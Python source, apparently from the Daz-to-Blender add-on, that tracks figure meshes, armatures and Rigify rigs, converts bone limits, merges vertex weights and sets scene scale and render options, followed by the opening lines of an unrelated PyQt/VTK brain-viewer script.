[16384, 65118, 259762],
[17454, 69398, 276882],
[17543, 69498, 276982],
[17246, 68056, 270644],
],
]
IS_EMERGENCY = False
EYLSCOUNT = 464
def get_children(object):
children = []
for ob in bpy.data.objects:
if ob.parent == object:
children.append(ob)
return children
def get_shape_key_custom_props():
fig_object_name = bpy.context.window_manager.choose_daz_figure
if fig_object_name == "null":
return []
if fig_object_name not in bpy.data.objects.keys():
return []
fig_object = bpy.data.objects[fig_object_name]
children = get_children(fig_object)
custom = []
for child in children:
if "_RNA_UI" in child.keys():
morphs = child["_RNA_UI"].keys()
custom.append({"mesh": child.name, "props": morphs})
return custom
def getMyMax3():
return max_vs[getSex()][get_geo_idx()]
def getIsG3():
return get_geo_idx() == G3_GEOIDX
def getIsEmergency():
return IS_EMERGENCY
def setItsEmergency():
global IS_EMERGENCY
IS_EMERGENCY = True
def isAcs():
wk = bpy.context.window_manager.search_prop
wk = wk.strip()
wk = wk.lower()
return wk == "#accessory"
def getSubdivLevel():
naga = len(getBody().data.vertices)
if naga > 200000:
return 2
elif naga > 60000:
return 1
else:
return 0
def get_root():
return root
def getSex():
if getIsMan():
return 1
else:
return 0
def isExistsAnimation():
if getAmtr() is None:
return False
my_amtr = getAmtr()
if my_amtr.animation_data is None:
return False
if my_amtr.animation_data.action is None:
return False
if my_amtr.animation_data.action.fcurves is None:
return False
if len(my_amtr.animation_data.action.fcurves) <= 0:
return False
return True
def orthopedic_sharp(word):
word = word.replace(" ", "")
word = word.lower()
return word
def isRiggedObject(dobj):
if dobj.type == "MESH":
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if (
modifier.object.name == get_Amtr_name()
or modifier.object.name == get_Rgfy_name()
):
return True
return False
def isRiggedObject_when_Amtr_is_None(dobj):
if dobj.type == "MESH":
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE":
return True
return False
def store_ary(is_now):
global now_ary
global pst_ary
if is_now == False:
now_ary = []
pst_ary = []
for d in Util.myccobjs():
if is_now:
now_ary.append(d.name)
else:
pst_ary.append(d.name)
def what_new():
if len(now_ary) - len(pst_ary) < 1:
return ""
for n in now_ary:
hit = False
if n not in pst_ary:
return n
return ""
def setOpsMode(arg):
combi = ["POSE", "EDIT", "OBJECT", "SCULPT"]
if arg in combi:
if Versions.get_active_object() is not None:
if Versions.get_active_object().mode != arg:
bpy.ops.object.mode_set(mode=arg)
def get_Amtr_name():
if _AMTR != "" and (_AMTR in Util.allobjs()):
return _AMTR
else:
return ""
def get_Body_name():
if _BODY != "" and (_BODY in Util.allobjs()):
return _BODY
else:
return ""
def get_Eyls_name():
if _EYLS != "" and (_EYLS in Util.allobjs()):
return _EYLS
else:
return ""
def get_Tear_name():
if _TEAR != "" and (_TEAR in Util.allobjs()):
return _TEAR
else:
return ""
def get_Hair_name():
if _HAIR != "" and (_HAIR in Util.allobjs()):
return _HAIR
else:
return ""
def get_KeepEyls_name():
return keep_EYLS
def get_KeepTear_name():
return keep_TEAR
def get_Rgfy_name():
if _RGFY != "" and (_RGFY in Util.allobjs()):
return _RGFY
else:
return ""
def getIsMan():
return isMan
def getIsGen():
return isGen
def getIsEyls():
return _EYLS != ""
def getIsTEAR():
return _TEAR != ""
def getIsHair():
return _HAIR != ""
def setEylsIsJoined():
global _EYLS
_EYLS = ""
def setTearIsJoined():
global _TEAR
_TEAR = ""
def find_RGFY_all():
for d in Util.myccobjs():
if find_RGFY(d):
return True
return False
def getFileSp():
if os.name == "nt":
return "\\"
else:
return "/"
def find_RGFY(dobj):
global _RGFY
if dobj.type == "ARMATURE":
abones = dobj.data.bones
if len(abones) > 600:
list = ["ORG-", "DEF-", "MCH-", 0, 0, 0]
for ab in abones:
for i in range(3):
if ab.name.startswith(list[i]):
list[i + 3] += 1
if list[3] > 100 and list[4] > 100 and list[5] > 70:
_RGFY = dobj.name
_AMTR = ""
return True
return False
# TODO: Find a method to get the Armature needed when Rigify is run
def find_AMTR(dobj):
global _AMTR
if dobj.type == "ARMATURE" and "Genesis" in dobj.name:
_AMTR = dobj.name
return True
return False
def find_amtr(dobj):
global dtu
import_name = dtu.get_import_name()
global _AMTR
if dobj.type == "ARMATURE" and import_name in dobj.name:
_AMTR = dobj.name
return True
return False
def find_BODY(dobj):
global _BODY
if dobj.type == "MESH":
if Versions.isHide(dobj):
return False
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if modifier.object.name == _AMTR or modifier.object.name == _RGFY:
figure_name = dobj.name.replace(".Shape", "")
figure_name = figure_name.split(".")[0]
if figure_name in [
"Genesis8Female",
"Genesis8Male",
"Genesis8_1Male",
"Genesis8_1Female",
"Genesis3Male",
"Genesis3Female",
"Genesis2Female",
"Genesis2Male",
"Genesis",
]:
_BODY = dobj.name
return True
return False
def load_dtu(dtu_to_load):
global dtu
dtu = dtu_to_load
# new find body used for importing
def find_body(dobj):
global dtu
import_name = dtu.get_import_name()
global _BODY
if dobj.type == "MESH":
if Versions.isHide(dobj):
return False
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if modifier.object.name == _AMTR or modifier.object.name == _RGFY:
figure_name = dobj.name.replace(".Shape", "")
figure_name = figure_name.split(".")[0]
if figure_name == import_name:
_BODY = dobj.name
return True
return False
def get_children(obj):
children = []
col = Util.getUsersCollection(obj)
for ob in Util.colobjs(col.name):
if ob.parent == obj:
children.append(ob)
return children
def find_Both(obj):
if obj.type == "MESH":
for modifier in obj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if find_AMTR(modifier.object) == False:
if find_RGFY(modifier.object) == False:
return False
return find_BODY(obj)
elif obj.type == "ARMATURE":
if find_AMTR(obj) or find_RGFY(obj):
kids = get_children(obj)
for k in kids:
if find_BODY(k):
return True
return False
return False
# TODO: Fix Logic of Combination of Tears
def find_EYLS(dobj):
global _EYLS
global keep_EYLS
if isRiggedObject(dobj):
if "Eyelashes" in dobj.name:
_EYLS = dobj.name
keep_EYLS = deepcopy(dobj.name)
return True
return False
def find_TEAR(dobj):
global _TEAR
global keep_TEAR
if "Tear" in dobj.name:
_TEAR = dobj.name
keep_TEAR = deepcopy(dobj.name)
return True
return False
def find_HAIR(dobj):
global _HAIR
if isRiggedObject(dobj):
if ("brow" in dobj.name.lower()) == False:
hi = 0
count = [0, 0]
if getBody() is not None:
cnt = 0
hi = getBody().dimensions[2]
if hi < getBody().dimensions[1]:
hi = getBody().dimensions[1]
vgs = dobj.vertex_groups
for v in dobj.data.vertices:
if v.co[1] >= hi or v.co[2] >= hi:
count[0] += 1
for gp in v.groups:
vgname = vgs[gp.group].name.lower()
if "head" in vgname:
count[1] += 1
elif ("abdomen" in vgname) or ("forearm" in vgname):
count[1] -= 1
if count[0] > 10 and count[1] > 10:
_HAIR = dobj.name
return True
return False
def find_ENVROOT(dobj):
fromtop = []
frombtm = []
cname = Util.getUsersCollectionName(dobj)
objs = Util.colobjs(cname)
global _ENVROOT
if len(objs) == 1:
_ENVROOT = objs[0].name
return
for obj in objs:
find = False
while obj.parent is not None:
find = True
obj = obj.parent
if find == False:
fromtop.append(obj)
else:
if not (obj in frombtm):
frombtm.append(obj)
if (len(fromtop) == 1 and len(frombtm) == 1) == False:
return
if fromtop[0] != frombtm[0]:
return
if fromtop[0].type == "ARMATURE" or fromtop[0].type == "EMPTY":
_ENVROOT = fromtop[0].name
def getEnvRoot():
if _ENVROOT != "" and (_ENVROOT in Util.allobjs()):
return Util.allobjs().get(_ENVROOT)
def decide_HERO():
global _AMTR
global _RGFY
global _BODY
global _EYLS
global _TEAR
global _HAIR
global isMan
global isGen
global _BVCount
global _ISG3
global Geo_Idx
global _SIZE
clear_variables()
active_col_objs = Util.myacobjs()
# Find Armatures
exists = {"_AMTR": False, "_RGFY": False, "_BODY": False}
for dobj in active_col_objs:
if exists["_AMTR"] == False:
exists["_AMTR"] = find_AMTR(dobj)
if exists["_AMTR"]:
continue
if exists["_RGFY"] == False:
exists["_RGFY"] = find_RGFY(dobj)
if exists["_RGFY"]:
continue
    # Needs to be separated as Rigify changes order
for dobj in active_col_objs:
if exists["_BODY"] == False:
exists["_BODY"] = find_BODY(dobj)
if exists["_BODY"]:
continue
if "Male" in _BODY:
isMan = True
# Removed until found necessary
# if find_EYLS(dobj):
# continue
# if find_HAIR(dobj):
# continue
# if find_TEAR(dobj):
# continue
def store_variables():
global _AMTR
global _RGFY
global _BODY
global _EYLS
global _TEAR
global _HAIR
global isMan
global isGen
global _BVCount
global _ISG3
global Geo_Idx
global _SIZE
clear_variables()
active_col_objs = Util.myacobjs()
# Find Armatures
exists = {"_AMTR": False, "_RGFY": False, "_BODY": False}
for dobj in active_col_objs:
if exists["_AMTR"] == False:
exists["_AMTR"] = find_amtr(dobj)
if exists["_AMTR"]:
continue
if exists["_RGFY"] == False:
exists["_RGFY"] = find_RGFY(dobj)
if exists["_RGFY"]:
continue
    # Needs to be separated as Rigify changes order
for dobj in active_col_objs:
if exists["_BODY"] == False:
exists["_BODY"] = find_body(dobj)
if exists["_BODY"]:
continue
if "Male" in _BODY:
isMan = True
# Removed until found necessary
# if find_EYLS(dobj):
# continue
# if find_HAIR(dobj):
# continue
# if find_TEAR(dobj):
# continue
def addG3Database(isman):
sql = ""
if isman == False and len(DataBase.f_geni) == G3_GEOIDX - 1:
sql = "select SRC,DST from G3F order by SRC"
elif isman and len(DataBase.m_geni) == G3_GEOIDX - 1:
sql = "select SRC,DST from G3M order by SRC"
if sql == "":
return
con = getCon()
cur = con.cursor()
cur.execute(sql)
addtbl = []
for row in cur:
addtbl.append([row[0], row[1]])
if isman:
DataBase.m_geni.append(addtbl)
else:
DataBase.f_geni.append(addtbl)
cur.close()
con.close()
def getMf():
global Geo_Idx
global isMan
if getBody() is None:
return
rtn = [False, False, False]
verts = getBody().data.vertices
if getAmtr() is not None:
xr = getAmtr().rotation_euler[0]
else:
xr = 0
is_fst = xr > math.radians(88) and xr < math.radians(92)
if is_fst:
hi = getBody().dimensions[1]
hi = (hi * 9) / 10
else:
hi = getBody().dimensions[2]
hi = (hi * 8) / 10
tops = [[5358, 69, 3958, 79, 5534, 3], [5054, 69, 3733, 78, 5230, 3]] # 5345,5041,
for sex in range(2):
isMan = sex == 1
Geo_Idx = 0
if is_fst and ("Male" in getBody().name) and sex == 0:
continue
max = len(DataBase.f_geni) + 1
if isMan:
max = len(DataBase.m_geni) + 1
for i in range(max):
point = 0
tpast = 0
max3 = max_vs[sex][i]
# if (len(getBody().data.vertices) in max3)==False:
# continue
for tidx, t in enumerate(tops[sex]):
v = verts[t]
src_t = t
Geo_Idx = i
if i > 0:
t = toGeniVIndex(t)
v = verts[t]
vpast = verts[tpast]
if is_fst:
if v.co[1] > hi and v.co[0] < 0.3 and v.co[0] > -0.3:
if tidx == 0 or (tidx > 0 and v.co[2] > vpast.co[2]):
point += 1
else:
if v.co[2] > hi and v.co[0] < 0.3 and v.co[0] > -0.3:
if tidx == 0 or (tidx > 0 and v.co[1] < vpast.co[1]):
point += 1
tpast = t
if point == 6:
rtn[0] = sex == 1
rtn[1] = i > 0
rtn[2] = True
return rtn
Geo_Idx = 0
return rtn
def boneRotation_onoff(context, flg_on):
rig = context.active_object
if rig is None or rig.type != "ARMATURE":
return
for pb in rig.pose.bones:
for c in pb.constraints:
if c.name == "Limit Rotation":
c.mute = flg_on == False
def getRootPath():
global root
# if bpy.context.window_manager.use_custom_path:
# root = ""
# else:
if root == "":
hdir = os.path.expanduser("~")
hdir = os.path.join(
hdir, "Documents", "DAZ 3D", "Bridges", "Daz To Blender", "Exports"
)
print("Files Should be Exporting to : {0}".format(hdir))
if os.path.exists(hdir):
root = hdir
else:
root = ""
return root
def get_custom_path():
return bpy.context.scene.dtb_custom_path.path.replace("\\", "/")
def get_config_path():
global config
if config == "":
hdir = os.path.expanduser("~")
hdir = os.path.join(
hdir, "Documents", "DAZ 3D", "Bridges", "Daz To Blender", "Config"
)
if os.path.exists(hdir):
config = hdir
else:
config = ""
return config
def load_asset_name():
global _ASSETNAME
for file in os.listdir(getHomeTown()):
if file.endswith(".dtu"):
dtu = os.path.join(getHomeTown(), file)
break
with open(dtu, "r") as file:
_ASSETNAME = json.load(file)["Asset Name"]
def get_asset_name():
return _ASSETNAME
def clear_already_use_newmtl():
global already_use_newmtl
already_use_newmtl = []
def set_already_use_newmtl(newmtl):
global already_use_newmtl
already_use_newmtl.append(newmtl)
def is_already_use_newmtl(newmtl):
is_in = newmtl in already_use_newmtl
print("@@@", is_in, newmtl, already_use_newmtl)
return is_in
def setHomeTown(htown):
global _HOMETOWN
_HOMETOWN = htown
def getHomeTown():
return _HOMETOWN
def clear_variables():
global isMan
global isGen
global _AMTR
global _BODY
global _EYLS
global _TEAR
global _HAIR
global _RGFY
global keep_EYLS
global Geo_Idx
global _ISG3
global _SIZE
global IS_EMERGENCY
global _BVCount
global now_ary
global pst_ary
global _ENVROOT
global shape_key_custom_props
isMan = False
isGen = False
_AMTR = ""
_BODY = ""
_EYLS = ""
_HAIR = ""
_RGFY = ""
keep_EYLS = ""
Geo_Idx = 0
_ISG3 = 0
_SIZE = 0
_ENVROOT = ""
IS_EMERGENCY = False
_BVCount = 0
now_ary = []
pst_ary = []
shape_key_custom_props = []
# for scene in bpy.data.scenes:
# scene.unit_settings.scale_length = 1
def amIRigfy(cobj):
if cobj.type == "ARMATURE" and _RGFY == cobj.name:
return True
return False
def amIAmtr(cobj):
if cobj.type == "ARMATURE" and _AMTR == cobj.name:
return True
return False
def amIBody(cobj):
if cobj.type == "MESH" and _BODY == cobj.name:
return True
return False
def getHair():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _HAIR:
return dobj
return None
def getBody():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _BODY:
return dobj
return None
def getEyls():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _EYLS:
return dobj
return None
def getTear():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _TEAR:
return dobj
return None
def getRgfyBones():
rig = getRgfy()
if rig is not None:
return rig.data.bones
return None
def getRgfy():
for dobj in Util.allobjs():
if dobj.type == "ARMATURE" and dobj.name == _RGFY:
return dobj
return None
def setRgfy_name(newname):
global _RGFY
if getRgfy() is None:
return
getRgfy().name = newname
_RGFY = newname
def getAmtrBones():
rig = getAmtr()
if rig is not None:
return rig.data.bones
return None
def getAmtr():
for dobj in Util.allobjs():
if dobj.type == "ARMATURE" and dobj.name == _AMTR:
return dobj
return None
def getAmtrConstraint(bone_name, const_name):
    if getAmtr() is None:
return
pbone = getAmtr().pose.bones.get(bone_name)
if pbone is None:
return
for c in pbone.constraints:
if c.name == const_name:
return c
return None
def deselect():
for obj in Util.allobjs():
Versions.select(obj, False)
def toGeniVIndex(vidx):
old = 0
if Geo_Idx <= 0 or Geo_Idx >= 10:
return vidx
if getIsMan() == False:
for ridx, r in enumerate(DataBase.f_geni[Geo_Idx - 1]):
if vidx < r[0] and ridx > 0:
vidx -= old
break
old = r[1]
else:
for ridx, r in enumerate(DataBase.m_geni[Geo_Idx - 1]):
if vidx < r[0] and ridx > 0:
vidx -= old
break
old = r[1]
return vidx
def get_geo_idx():
return Geo_Idx
def getRig_id():
rig = getRgfy()
for d in rig.data:
if d.name == "rig_id":
return d.data["rig_id"]
def bone_limit_modify(bone_limits):
for bone_limit_key in bone_limits:
bone_limit = bone_limits[bone_limit_key]
name = bone_limit[0]
order = bone_limit[1]
prefix = name[0:1]
post_prefix = name[1:2]
bone_type = "none"
if prefix == "l" and post_prefix.isupper():
bone_type = "left"
elif prefix == "r" and post_prefix.isupper():
bone_type = "right"
else:
bone_type = "center"
do_conversion = True
if do_conversion and order == "XYZ":
# YZ switch (Y <-> Z)
for i in range(2):
temp = bone_limit[4 + i]
bone_limit[4 + i] = bone_limit[6 + i]
bone_limit[6 + i] = temp
# XY switch (X <-> Y)
for i in range(2):
temp = bone_limit[2 + i]
bone_limit[2 + i] = bone_limit[4 + i]
bone_limit[4 + i] = temp
if bone_type == "right":
# Y invert (-Y)
temp = 0 - bone_limit[5]
bone_limit[5] = 0 - bone_limit[4]
bone_limit[4] = temp
# Z invert (-Z)
temp = 0 - bone_limit[7]
bone_limit[7] = 0 - bone_limit[6]
bone_limit[6] = temp
elif do_conversion and order == "XZY":
# XY switch (X <-> Y)
for i in range(2):
temp = bone_limit[2 + i]
bone_limit[2 + i] = bone_limit[4 + i]
bone_limit[4 + i] = temp
# X invert (-X)
temp = 0 - bone_limit[3]
bone_limit[3] = 0 - bone_limit[2]
bone_limit[2] = temp
if bone_type == "right":
# Y invert (-Y)
temp = 0 - bone_limit[5]
bone_limit[5] = 0 - bone_limit[4]
bone_limit[4] = temp
# Z invert (-Z)
temp = 0 - bone_limit[7]
bone_limit[7] = 0 - bone_limit[6]
bone_limit[6] = temp
elif do_conversion and order == "YZX":
# Bones that are pointed down with YZX order
# TODO: remove hardcoding
if name in [
"hip",
"pelvis",
"lThighBend",
"rThighBend",
"lThighTwist",
"rThighTwist",
"lShin",
"rShin",
]:
# Y invert (-Y)
temp = 0 - bone_limit[5]
bone_limit[5] = 0 - bone_limit[4]
bone_limit[4] = temp
# Z invert (-Z)
temp = 0 - bone_limit[7]
bone_limit[7] = 0 - bone_limit[6]
bone_limit[6] = temp
elif do_conversion and order == "ZXY":
# XY switch (X <-> Y)
for i in range(2):
temp = bone_limit[2 + i]
bone_limit[2 + i] = bone_limit[4 + i]
bone_limit[4 + i] = temp
# YZ switch (Y <-> Z)
for i in range(2):
temp = bone_limit[4 + i]
bone_limit[4 + i] = bone_limit[6 + i]
bone_limit[6 + i] = temp
elif do_conversion and order == "ZYX":
# YZ switch (Y <-> Z)
for i in range(2):
temp = bone_limit[4 + i]
bone_limit[4 + i] = bone_limit[6 + i]
bone_limit[6 + i] = temp
# X invert (-X)
temp = 0 - bone_limit[3]
bone_limit[3] = 0 - bone_limit[2]
bone_limit[2] = temp
store_bone_limits(bone_limits)
return bone_limits
def store_bone_limits(bone_limits):
global updated_bone_limits
updated_bone_limits = bone_limits
def get_bone_limit():
return updated_bone_limits
def toMergeWeight(dobj, ruler_idx, slave_idxs):
setOpsMode("OBJECT")
Versions.active_object(dobj)
vgs = dobj.vertex_groups
for i, v in enumerate(dobj.data.vertices):
find = False
other_weight = 0.0
for s in slave_idxs:
if s < 0:
continue
for g in v.groups:
if g.group == s:
list = [i]
vgs[g.group].remove(list)
find = True
elif g.group != ruler_idx:
other_weight += g.weight
if find == True:
list = [i]
if other_weight > 0.0 and other_weight < 1.0:
vgs[ruler_idx].add(list, (1.0 - other_weight), "ADD")
else:
vgs[ruler_idx].add(list, 1.0, "ADD")
def toMergeWeight2(dobj, ruler_idx, slave_idxs, flg_half):
setOpsMode("OBJECT")
Versions.active_object(dobj)
vgs = dobj.vertex_groups
vw_ary = []
for vidx, v in enumerate(dobj.data.vertices):
for s in slave_idxs:
if s < 0:
continue
for g in v.groups:
wt = g.weight
if flg_half:
wt = wt / 2.0
if g.group == s:
list = [vidx]
for vw in vw_ary:
if vw[0] == vidx:
vw[1] += wt
wt = 0
if wt > 0:
vw_ary.append([vidx, wt])
vgs[g.group].remove(list)
for vw in vw_ary:
vgs[ruler_idx].add([vw[0]], vw[1], "ADD")
def toMergeWeight_str(dobj, ruler_name, slave_names, flg_head, flg_half):
Versions.select(dobj, True)
Versions.active_object(dobj)
ruler = -1
slave = []
vgs = dobj.vertex_groups
for vi, vg in enumerate(vgs):
if ruler_name == vg.name:
ruler = vi
else:
for sn in slave_names:
if sn in vg.name:
slave.append(vi)
break
if ruler >= 0 and len(slave) > 0:
if flg_head:
toMergeWeight2(dobj, ruler, slave, flg_half)
else:
toMergeWeight(dobj, ruler, slave)
def getFootAngle(r_l):
bones = ["hip", "pelvis", "ThighBend", "ThighTwist", "Shin", "Foot"]
kakudo3 = [[0, 0, 0, -1, 0, 0], [1, 2, 2, -1, 2, 1], [2, 1, -1, 1, 1, 2]]
minus3 = [[1], [0, 2, 4], [0]]
ans = [0, 0, 0]
flip_xyz = [0.0, 0.0, 0.0]
flip_value = 0.0
for i in range(3):
for bidx, bname in enumerate(bones):
if bidx >= 2:
if r_l == 0:
bname = "r" + bname
else:
bname = "l" + bname
if kakudo3[i][bidx] < 0:
continue
pb = getAmtr().pose.bones.get(bname)
if pb is None:
continue
rot = pb.rotation_euler[kakudo3[i][bidx]] * 57.3
for ms in minus3[i]:
if bidx == ms:
rot = 0 - rot
r = 0.0
# ThighBend
if bidx == 2:
# Fwd
if i == 0 and rot < 0:
r = math.fabs(rot)
if math.fabs(r) > 90:
r = 90
# Side
elif i == 1:
r = rot
flip_xyz[i] = r / 90.0
# ThighTwist Y
if bidx == 3 and i == 2:
flip_value = rot
ans[i] = ans[i] + rot
# Fwd
x = flip_value * flip_xyz[0]
if x < 0 and (math.fabs(ans[2] % 360) - x) >= 355:
x = -360 + ans[2] + 5
ans[2] -= x
ans[1] += x
# Side
y = flip_value * flip_xyz[1]
ans[0] += y
return ans
def ifNeedToSnapKnee(r_l):
poles = [getAmtr().pose.bones.get("rShin_P"), getAmtr().pose.bones.get("lShin_P")]
iks = [getAmtr().pose.bones.get("rShin_IK"), getAmtr().pose.bones.get("lShin_IK")]
k = iks[r_l].head[2] + iks[r_l].location[2]
return iks[r_l].head[2] > poles[r_l].head[2]
def get_size():
return float(bpy.context.window_manager.scene_scale)
def change_size(root):
if get_size() < 1:
# Scale Import
for i in range(3):
og_scale = root.scale[i]
root.scale[i] = og_scale * get_size()
setOpsMode("OBJECT")
Versions.active_object(root)
Versions.select(root, True)
bpy.ops.object.transform_apply(scale=True)
deselect()
for obj in Util.myacobjs():
if obj.type == "MESH":
if obj.parent == root:
Versions.select(obj, True)
Versions.active_object(obj)
bpy.ops.object.transform_apply(
location=True, rotation=True, scale=True
)
deselect()
elif obj.type == "LIGHT" or obj.type == "CAMERA":
for i in range(3):
og_scale = obj.scale[i]
obj.scale[i] = og_scale * get_size()
Versions.select(obj, True)
Versions.active_object(obj)
bpy.ops.object.transform_apply(scale=True)
deselect()
# Scale Daz_Pub
for d in Util.colobjs("DP"):
if d.type == "CAMERA" or d.type == "LIGHT":
og_location = (140, 100, 150)
for i in range(3):
d.location[i] = og_location[i] * get_size()
Versions.select(obj, True)
Versions.active_object(obj)
bpy.ops.object.transform_apply(scale=True)
deselect()
def float_by_size(float):
return float * get_size()
def scale_settings():
scene = bpy.context.scene
scene.tool_settings.use_keyframe_insert_auto = False
scene.unit_settings.system = "METRIC"
scene.unit_settings.scale_length = 1.0
if get_size() == 0.01:
scene.unit_settings.length_unit = "CENTIMETERS"
else:
scene.unit_settings.length_unit = "METERS"
# Change View Clipping
bpy.context.space_data.clip_start = get_size()
bpy.context.space_data.clip_end = 10000.00 * get_size()
bpy.context.space_data.lens = 50
location = [float_by_size(7.15), float_by_size(-4.35), float_by_size(100.0)]
rotation = [0.6888, 0.6246, 0.2473, 0.2727]
distance = float_by_size(430)
cam_ob = bpy.context.scene.camera
for area in bpy.context.screen.areas:
if area.type == "VIEW_3D":
rv3d = area.spaces[0].region_3d
if rv3d is not None:
rv3d.view_location = location
rv3d.view_rotation = rotation
rv3d.view_distance = distance
rv3d.view_camera_zoom = 0
rv3d.update()
viewport_data = rv3d
if cam_ob != None:
# Set Camera Position
cam_ob.matrix_world = viewport_data.view_matrix
cam_ob.matrix_world.invert()
# Set Camera Clipping
cam_ob.data.sensor_width = 64
cam_ob.data.clip_start = bpy.context.space_data.clip_start
cam_ob.data.clip_end = bpy.context.space_data.clip_end
bpy.context.preferences.inputs.use_mouse_depth_navigate = True
# Destroy the old hierarchy of the vertex groups
def convert_vgroups():
vgs = getBody().vertex_groups
setOpsMode("OBJECT")
Versions.active_object(getBody())
vidx = 0
total_vgs = len(vgs)
for vg in vgs:
if vg.name == "upperTeeth":
vg.name = "upperJaw"
elif vg.name == "LipLowerMiddle":
bpy.context.object.vertex_groups.active_index = vidx
bpy.context.object.vertex_groups[vidx].name = "lLipLowerMiddle"
bpy.ops.object.vertex_group_copy()
bpy.context.object.vertex_groups[total_vgs].name = "rLipLowerMiddle"
total_vgs += 1
elif vg.name == "CenterBrow":
bpy.context.object.vertex_groups.active_index = vidx
bpy.context.object.vertex_groups[vidx].name = "lCenterBrow"
bpy.ops.object.vertex_group_copy()
bpy.context.object.vertex_groups[total_vgs].name = "rCenterBrow"
total_vgs += 1
vidx += 1
half_liplower = [
["lLipLowerInner", ["lLipLowerMiddle"]],
["rLipLowerInner", ["rLipLowerMiddle"]],
]
for hl in half_liplower:
toMergeWeight_str(getBody(), hl[0], hl[1], True, True)
slave_rulers = [
["lowerJaw", ["lowerTeeth"]],
["tongue03", ["tongue04"]],
["lSquintInner", ["lNasolabialMiddle", "lNasolabialUpper"]],
["lNasolabialMouthCorner", ["lLipNasolabialCrease"]],
["lLipLowerOuter", ["lLipCorner"]],
]
for index, slave_ruler in enumerate(slave_rulers):
toMergeWeight_str(getBody(), slave_ruler[0], slave_ruler[1], True, False)
prefix = slave_ruler[0][0:1]
post_prefix = slave_ruler[0][1:2]
bone_type = "center"
if prefix == "l" and post_prefix.isupper():
bone_type = "left"
if bone_type == "left":
slave_ruler[0] = "r" + slave_ruler[0][1:]
for i in range(len(slave_ruler[1])):
slave_ruler[1][i] = "r" + slave_ruler[1][i][1:]
toMergeWeight_str(getBody(), slave_ruler[0], slave_ruler[1], True, False)
def mslot_to_vgroup(obj):
material_names = []
for index, slot in enumerate(obj.material_slots):
if not slot.material:
continue
verts = [
v
for f in obj.data.polygons
if f.material_index == index
for v in f.vertices
]
if len(verts):
vg = obj.vertex_groups.get(slot.material.name)
if vg is None:
vg = obj.vertex_groups.new(name=slot.material.name)
material_names.append(slot.material.name)
vg.add(verts, 1.0, "ADD")
return material_names
def finger(zindex):
keys = [
["Ring", "Mid", "Pinky", "Index", "Thumb"],
["f_ring", "f_middle", "f_pinky", "f_index", "thumb"],
]
if zindex == 0:
allbones = getAmtr().pose.bones
else:
allbones = getRgfy().pose.bones
for pb in allbones:
for k in keys[zindex]:
if (
zindex == 0
and pb.name[1:].startswith(k)
and len(pb.name) == len(k) + 2
and (pb.name.endswith("2") or pb.name.endswith("3"))
) or (
zindex == 1
and pb.name.startswith(k)
and len(pb.name) == len(k) + 5
and ((".02." in pb.name) or (".03." in pb.name))
):
find = False
for c in pb.constraints:
if c.name == "Copy Rotation":
mt = c.mute
c.mute = mt == False
find = True
break
if find:
break
cr = pb.constraints.new(type="COPY_ROTATION")
if zindex == 0:
cr.target = getAmtr()
length = len(pb.name)
starget = pb.name[: length - 1]
if pb.name.endswith("3"):
starget += "2"
else:
starget += "1"
else:
cr.target = getRgfy()
if ".03." in pb.name:
starget = pb.name.replace("3", "2")
elif ".02." in pb.name:
starget = pb.name.replace("2", "1")
cr.subtarget = starget
cr.use_x = k.lower() == "thumb"
cr.use_y = False
cr.use_z = k.lower() != "thumb"
Versions.mix_mode(cr)
cr.target_space = "LOCAL"
cr.owner_space = "LOCAL"
def getCon():
import sqlite3
cadr = os.path.join(os.path.dirname(__file__), "img", "dtb.sqlite")
con = sqlite3.connect(cadr)
return con
def get_symmetry(vidx, want_left):
if vidx <= 0:
return 0
tblName = "symmetry_"
if getIsMan():
tblName += "m"
else:
tblName += "f"
con = getCon()
cur = con.cursor()
if want_left:
sql = "select left from " + tblName + " where right = " + str(vidx)
else:
sql = "select right from " + tblName + " where left = " + str(vidx)
cur.execute(sql)
rtn = vidx
for row in cur:
rtn = row[0]
cur.close()
return rtn
def setRenderSetting(flg_high):
args = [[1, 12, 16, 260, "EXPERIMENTAL"], [2, 8, 2, 80, "SUPPORTED"]]
idx = 0 if flg_high else 1
bpy.context.scene.cycles.dicing_rate = args[idx][0]
bpy.context.scene.cycles.preview_dicing_rate = 8
bpy.context.scene.cycles.offscreen_dicing_scale = args[idx][1]
bpy.context.scene.cycles.max_subdivisions = args[idx][2]
bpy.context.scene.cycles.samples = args[idx][3]
bpy.context.scene.cycles.feature_set = args[idx][4]
class BoneRoop:
bones = []
vweights = []
def __init__(self, rootbone):
self.bones = []
self.vweights = []
self.find_bone_roop(getAmtr().data.bones[rootbone].children, rootbone)
def find_bone_roop(self, bone_group, rootbone):
for b in bone_group:
if len(b.children) > 0:
self.find_bone_roop(b.children, rootbone)
self.bones.append(b.name)
def getResultBones(self):
return self.bones
def getResultVertices(self):
vgs = getBody().vertex_groups
verts = getBody().data.vertices
for v in verts:
for g in v.groups:
if vgs[g.group].name in self.bones:
self.vweights.append(
[v.index, g.group, vgs[g.group].name, g.weight]
)
self.vweights.sort()
old_v = -1
sum = 0.0
rtn = []
for vw in self.vweights:
if old_v != vw[0]:
rtn.append([old_v, sum])
sum = 0.0
sum = sum + vw[3]
old_v = vw[0]
if sum > 0.0:
rtn.append([old_v, sum])
return rtn
|
456790
|
import math
import time
import os
import PyQt5.QtWidgets as QtWidgets
import PyQt5.QtCore as Qt
from vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
from vtkUtils import *
from config import *
class MainWindow(QtWidgets.QMainWindow, QtWidgets.QApplication):
def __init__(self, app):
self.app = app
QtWidgets.QMainWindow.__init__(self, None)
# base setup
self.renderer, self.frame, self.vtk_widget, self.interactor, self.render_window = self.setup()
self.brain, self.mask = setup_brain(self.renderer, self.app.BRAIN_FILE), setup_mask(self.renderer,
self.app.MASK_FILE)
# setup brain projection and slicer
self.brain_image_prop = setup_projection(self.brain, self.renderer)
self.brain_slicer_props = setup_slicer(self.renderer, self.brain) # causing issues with rotation
self.slicer_widgets = []
# brain pickers
self.brain_threshold_sp = self.create_new_picker(self.brain.scalar_range[1], self.brain.scalar_range[0], 5.0,
